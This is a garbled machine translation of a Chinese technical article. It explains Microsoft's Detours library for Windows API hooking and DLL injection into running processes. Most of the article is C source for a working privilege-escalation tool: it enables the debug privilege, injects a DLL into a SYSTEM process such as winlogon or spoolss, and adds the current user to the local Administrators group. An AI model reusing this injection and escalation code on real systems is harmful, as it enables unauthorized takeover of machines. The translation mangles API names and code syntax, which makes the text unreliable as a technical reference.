Get NT Administrator privileges with the DETOURS library
Chen Zhimin
---- DETOTOURS is a library developed by Microsoft (source code available for free at http://research.microsoft.com/sn/detours), which is used to modify images in the running program in memory, so that even if there is no Source code can also change the behavior of the program. The specific use is:
Intercepting the WIN32 API call, booting it into its own subroutine, thereby achieving customization of Win32 API.
Create a new thread for a running process, load your own code and run.
---- This article will introduce the principles of DETOTOTOURS, the usage of the DETOURS library function, and use the DETOURS library function to write a program on Windows NT, which makes users with the "debugger" user permission to become a system administrator. The appendix uses the DETOURS library function to modify the program to make normal users can become system administrators (on NT4 SP3).
One. The principle of DETOTOURS
---- 1. Memory Management of Win32 Process
---- Today, Windows NT implements virtual memory, each Win32 process has 4GB of virtual space, and details about the virtual memory structure of Win32 process and the specific details of its operations, please refer to the Win32 API manual, here only point to DETOTOURS Related points:
---- (1) The instruction to be executed in the process is also placed in a dummy space.
---- (2) You can use the QueryProtectex function to change the permissions of the page of the storage instruction to readable can be writable, then rewrite its content, thereby modifying the running program.
---- (3) You can use VirtualaLalkEx to assign your virtual memory from a process from a process, and then use the queryProtECTex function to change the permissions of the page to readable can be writable, and put the instruction to be executed to binary machine Writes in the form of a code to inject any code into a running process
---- 2. Intercepting the principle of win32 API
---- Detours defines three concepts:
---- (1) Target function: To intercept the function, usually the API of Windows.
---- (2) TRAMPOLINE function: replica of Target functions. Because DETOURS will rewrite the Target function, then save the target function to save the Target function, the process call semantics, which is easy to recover, and on the other hand.
---- (3) DETOUR function: used to replace the function of the Target function.
---- DETOTOURS In the beginning of the Target function, add the JMP address_of_ detour_ function command (Total 5 bytes) Boot the call to the Target function to its own detour function, add 5 bytes of the Target function plus JMP Address_OF_ TARGET _ FUNCTION 5 as a trampoline function. The example is as follows:
Before interception: Target _ function:
; Target function portfolio, the following is a common subminary entry code
Push EBP
MOV EBP, ESP
Push EAX
Push EBX
TRAMPOLINE:
The following is the continuation of the Target function
......
After interception: Target _ function:
JMP DETOUR_FUNCTION
TRAMPOLINE:
The following is the continuation of the Target function
......
TRAMPOLINE_FUNCTION:
; TRAMPOLINE function entry, the 5 bytes starting with the Target function same PUSH EBP
MOV EBP, ESP
Push EAX
Push EBX
Jump back to continue the Target function
JMP Target_Function 5
---- 3. Mount a DLL for a process that is running
---- The following is its steps:
---- (1) Create a threadFuction, which is only called LoadLibrary.
---- (2) Use virtualallocex to assign a virtual in the running process and change the permissions to readable writable.
---- (3) Write the binary machine code of ThreadFuction into this dummy.
---- (4) Create a thread on this process with CreateRemThetRead, incurring the starting address of the previously assigned virtual memory as the address of the thread function, can be loaded into a DLL that is running. You can run your own code in a running process through DLLMain.
two. DETOURS library function
---- Because the DETOURS package does not come with a help file, the following interface is only available from the profile source code.
---- 1. PBYTE WINAPI DETOURFINDFUNCTION (PCHAR PSZModule, Pchar Pszfunction)
---- Function: Find the entry address of a function from a DLL
---- Parameter: pszmodule is the DLL name, PSZFunction is a function name.
---- Back: The entry address of the function named pszfunction named pszmodule's DLL
.
---- 2. DETOUR_TRAMPOLINE (TRAMPOLINE_PROTYPE, TARGET_NAME)
---- Function: This macro generates a TRAMPOLINE function named target_name, and then calls Trampoline_Prototype in semantic equal to the Target function.
---- 3. Bool WinApi DetourFunctionWithtrampoline (Pbyte Pbtrampoline, Byte Pbdetour)
---- Function: Intercept Target Function with Detour Function
---- Parameter: PBTRAMPOLINE is the trampoline_prototype obtained by Detour_trampoline, PBDetour is the entrance address of the DETOUR function.
---- 4. Bool WinApi DetourremovewithTrampoline (Pbyte Pbtrampoline, Pbyte Pbdetour)
---- Function: Restore Target Functions
---- Parameter: PBTRAMPOLINE is the trampoline_prototype obtained by Detour_trampoline, PBDetour is the entrance address of the DETOUR function.
---- 5. Bool WinApi ContinueProcessWithdll (Handle HProcess, LPCSTR LPDLLNAME)
---- Function: Mount a DLL for a process that is running
---- Parameters: hprocess is the handle of the process, LPDLLNAME is the DLL name to be loaded
three. Program example
---- Use a user who can make users permission with "debugprons" to explain the usage of the DETOURS library function. The program's design idea is to find a process running in a System account, such as spoolss.exe, rpcss.exe, WinLogon.exe, Service.exe, etc., using ContinueProcessWithdll in injected a DLL that adds the current user to the Administrators local group because of this DLL operates in the security context environment of these processes, so there is corresponding permissions. ---- Write the corresponding DLL first:
/ *Admin.dll, when the process is loaded, you will name SzaccountName
Users join the Administrators local group. * /
#include
#include
#include
#include
/ * The following creates a share of data communication between the implementation process,
Szaccountname is a username, bprepared description
SzaccountName is initialized. * /
#pragma data_seg (". myshare")
Bool bprepared = false;
Wchar_t szaccountname [100] = {0};
#pragma data_seg ()
#pragma comment (Linker, "/SECTION :.MYSHARE ,RWS")
/ * Program call setAccountName Settings To add to Administrators
The username of the local group, and inform DLLMain
SzaccountName has been initialized,
You can call ElevatePriv * / when loading it.
__Declspec (DLLEXPORT) Void WinApi
Setaccountname (Wchar_t * name)
{
WCSCPY (SzaccountName, Name);
BPRepared = true;
}
/ * Add users named SzaccountName
To Administrators local group * /
__Declspec (DLLEXPORT) Void WinAPI ElevatePriv ()
{
Localgroup_members_info_3 account;
Account.lgrmi3_domainandname = szaccountname;
NetLocalGroupAddmembers (Null, L "administrators",
3, (LPBYTE) & Account, 1);
}
__Declspec (DLLEXPORT) ULONG WINAPI
Dllmain (Hinstance Hinstance,
DWORD DWREASON, PVOID LPRESERVED)
{
Switch (dwreason) {
Case DLL_THREAD_ATTACH:
IF (BPRepared)
ElevatePriv ();
}
Return True;
}
The procedure is as follows:
/*Addmetoadministrators.exe adds the current user to
ADMINISTRATORS local group. How to use: (1)
---- Run Task Manager finds spoolss.exe or rpcss.exe or process ID (2) executes addMetoadministrators.exe procid, where procid is (1) process ID (3) If you sign a check-in, run the User Manager, you can find yourself in the Administrators local group. * /
#include
#include
#include
#include
#includeextern void WinApi setAccountname (wchar_t * name);
/ * GetCurrentuser gets your own user name * /
Void getcurrentuser (wchar_t * szname)
{
Handle HProcess, HaccesStoken;
Wchar_t infino [1000], szaccountname [200],
SZDomainName [200];
Ptoken_user ptokenuser = (ptoken_user) Infobuffer;
DWORD DWINFOBUFFERSIZE, DWACCOUNTSIZE = 200,
DWDOMAINSIZE = 200;
SID_NAME_USE SNU;
HProcess = getCurrentProcess ();
OpenProcessToken (HProcess, Token_Read, & HaccessToken);
GetTokenInformation (HaccesStoken, Tokenuser,
InfoBuffer,
1000, & dwinfobuffersize);
Lookupaccountsid (null, ptokenuser-> user.sid,
Szaccountname,
& dwaccountsize, szdomainname, & dwdomainsize, & snu);
WCSCPY (SZNAME, SZDOMAINNAME);
WCSCAT (SZNAME, L "//);
WCSCAT (SZNAME, SZACCOUNTNAME);
}
/ * EnablePrivilege Enables users' permissions of their "debugger" * /
Bool EnablePrivilege (LPCTSTR SZPRIVNAME (BOOL FENABLE)
{
Handle htokeen;
IF (! openprocesstoken (getCurrentProcess (),
Token_adjust_privileges, & htokeen))
Return False;
Token_Privileges TP;
Tp.privilegectount = 1;
LookuppprivileGevalue (Null, Szprivname,
& tp.privileges [0] .luid);
Tp.privileges [0] .attributes = fenable?
SE_PRIVILEGE_ENABED: 0;
AdjustTokenprivileges (HToken, False, & TP,
SizeOf (TP), NULL, NULL;
Return ((GetLastError () == Error_Success));
}
Int WinApi Winmain (Hinstance Hinst, Hinstance Hprev,
LPSTR LPSZCMDLINE, INT
ncmdshow)
{
Int argc;
Wchar ** argv;
Argv = CommandLinetoargvw (getcommandlinew (),
& argc);
INT nProcessID = -1;
IF (argc! = 2) {
WPrintf (L "usage% s pid", argv [0]);
Return 1;
}
nprocessid = _wtoi (argv [1]);
Printf ("% d / n", nprocessid;
---- / * To successfully execute ContinueProcessWithdll, you have to have the process handle of Winlogon.exe and other processes with write write memory content and create threads, EnablePrivilege makes this process such rights. * / if (! EnablePrivilege (SE_DEBUG_NAME, TRUE) {
Printf ("AdjustTokenPrivileGe Fail% U / N",
(Uint) getLastError ());
Return 1;
}
Handle gnewhandle =
OpenProcess (Process_All_Access
, True, NProcessid;
IF (! gnewhandle) {
Printf ("OpenProcess Fail% U / N",
(Uint) getLastError ());
Return 1;
}
Wchar_t szname [100];
GetCurrentuser (szname);
Setaccountname (SZNAME);
IF (! ContinueProcessWithdll (Gnewhandle,
L "c: //temp//admin.dll")) {
Printf ("ContinueProcessWithdll Failed% U",
(Uint) getLastError ());
Return 3;
}
Return 0;
}
---- Because the user rights of the Debugger use only gives the administrator by default, it will not cause security vulnerabilities. However, the program discloses that the user authority of the "debugger" is actually a supreme user permission, and can only be granted to the trusted user.
four. Conclusion ---- DETOTOTOURS is a powerful tool that provides a simple and easy-to-use function interface to block the Win32 API call and load a DLL for a running process.